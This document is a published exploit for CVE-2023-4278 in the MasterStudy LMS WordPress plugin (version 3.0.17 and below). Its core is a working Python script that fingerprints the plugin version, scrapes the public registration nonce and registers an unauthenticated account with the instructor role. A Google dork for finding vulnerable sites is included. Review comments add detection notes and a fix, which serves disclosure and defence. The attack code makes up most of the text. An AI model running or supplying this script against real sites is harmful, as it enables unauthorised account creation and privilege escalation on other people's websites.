WordPress Masterstudy LMS 3.0.17 Account Creation
WordPress Masterstudy LMS plugin version 3.0.17 suffers from an unauthenticated instructor account creation vulnerability.
# Exploit Title: Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation
# Google Dork: inurl:/user-public-account
# Date: 2023-09-04
# Exploit Author: Revan Arifio
# Vendor Homepage: https:/.org/plugins/masterstudy-lms-learning-management-system/
# Version: <= 3.0.17
# Tested on: Windows, Linux
# CVE : CVE-2023-4278
"""Proof of concept for CVE-2023-4278 (MasterStudy LMS <= 3.0.17).

What it demonstrates: the plugin's public registration endpoint
(``/wp-admin/admin-ajax.php?action=stm_lms_register``) accepts the
``become_instructor`` field from an unauthenticated caller, so a
self-registered user ends up with the instructor role. The only token
involved is the public ``stm_lms_register`` nonce embedded in the
``/user-public-account`` page; a nonce is a CSRF token, not an
authorization check.

Defensive notes:
* Fix: update the plugin to 3.0.18 or later, which per the advisory adds
  the registration checks that these versions lack.
* Detection: an unauthenticated GET of ``/user-public-account`` followed by
  a POST to ``/wp-admin/admin-ajax.php?action=stm_lms_register`` whose JSON
  body carries ``"become_instructor": true``; also review instructor-role
  accounts that were created without an administrator's involvement.
"""

import requests
import os  # NOTE(review): not used anywhere in this script
import re
import time

# ASCII-art banner. The line breaks of the art were lost in this copy of the
# script, so it is kept as the single-line string it arrived as.
banner = """ _______ ________ ___ ___ ___ ____ _ _ ___ ______ ___ / ____\ \ / / ____| |__ \ / _ \__ \|___ \ | || |__ \____ / _ \ | | \ \ / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) | / / (_) | | | \ \/ / | __|______/ /| | | |/ / |__ <______|__ _/ / / / > _ < | |____ \ / | |____ / /_| |_| / /_ ___) | | |/ /_ / / | (_) | \_____| \/ |______| |____|\___/____|____/ |_|____/_/ \___/ ======================================================================================================|| Title : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation |||| Author : https://github.com/revan-ar |||| Vendor Homepage : https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/ |||| Support : https://www.buymeacoffee.com/revan.ar ||======================================================================================================"""
print(banner)


# get nonce
def get_nonce(target):
    """Fetch the public ``stm_lms_register`` nonce from ``/user-public-account``.

    Args:
        target: Base URL of the WordPress site, without a trailing slash.

    Returns:
        The captured nonce string; otherwise prints a message and falls off
        the end (implicit ``None``).

    Note:
        ``re.search`` returns ``None`` when the pattern is absent, and
        indexing ``None`` raises ``TypeError``; the ``else`` branch below is
        therefore not what runs on a page without the nonce.
    """
    open_target = requests.get("{}/user-public-account".format(target))
    # The page embeds the nonce as "stm_lms_register":"<value>".
    search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text)
    if search_nonce[1] != None:
        return search_nonce[1]
    else:
        print("Failed when getting Nonce :p")


# privielege escalation
def privesc(target, nonce, username, password, email):
    """Register ``username`` through the AJAX endpoint with the instructor flag set.

    The body mirrors the plugin's registration form; the field that matters
    is ``become_instructor``, which the affected versions accept without any
    authorization check (that is the CVE-2023-4278 defect).

    Args:
        target: Base URL of the WordPress site.
        nonce: Value obtained by ``get_nonce``.
        username, password, email: Credentials for the account being created.

    Side effects:
        One POST request; prints a success line on HTTP 200 and a failure
        line otherwise. Only the status code is inspected, not the body.
    """
    req_data = {
        "user_login":"{}".format(username),
        "user_email":"{}".format(email),
        "user_password":"{}".format(password),
        "user_password_re":"{}".format(password),
        # The privilege-relevant field: requests the instructor role at sign-up.
        "become_instructor":True,
        "privacy_policy":True,
        "degree":"",
        "expertize":"",
        "auditory":"",
        "additional":[],
        "additional_instructors":[],
        "profile_default_fields_for_register":[],
        "redirect_page":"{}/user-account/".format(target)
    }
    # This is the request an access-log or WAF review should flag when it
    # arrives from an unauthenticated session.
    start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data)
    if start.status_code == 200:
        print("[+] Exploit Success !!")
    else:
        print("[+] Exploit Failed :p")


# URL target
target = input("[+] URL Target: ")
print("[+] Starting Exploit")
# Version fingerprint: fetch the plugin's readme.txt and read its
# "Stable tag:" line. As in get_nonce, a missing match makes the next
# line raise TypeError rather than report anything.
plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target))
plugin_version = re.search("Stable tag: (.+)", plugin_check.text)
# Dots are stripped and the remaining digits compared as one integer
# ("3.0.17" -> 3017 < 3018). This is not a semantic-version comparison.
int_version = plugin_version[1].replace(".", "")
time.sleep(1)
if int(int_version) < 3018:
    print("[+] Target is Vulnerable !!")
    # Credentials for the account to be registered.
    email = input("[+] Email: ")
    username = input("[+] Username: ")
    password = input("[+] Password: ")
    time.sleep(1)
    print("[+] Getting Nonce...")
    # NOTE(review): this rebinds the name get_nonce from the function to its result.
    get_nonce = get_nonce(target)
    if get_nonce != None:
        print("[+] Success Getting Nonce: {}".format(get_nonce))
        time.sleep(1)
        # Registration request with become_instructor set (see privesc).
        privesc(target, get_nonce, username, password, email)
        # ----------------------------------
else:
    print("[+] Target is NOT Vulnerable :p")
CVE-2023-4278
The MasterStudy LMS WordPress plugin before 3.0.18 does not have proper checks in place during registration, allowing anyone to register on the site as an instructor. They can then add courses and/or posts.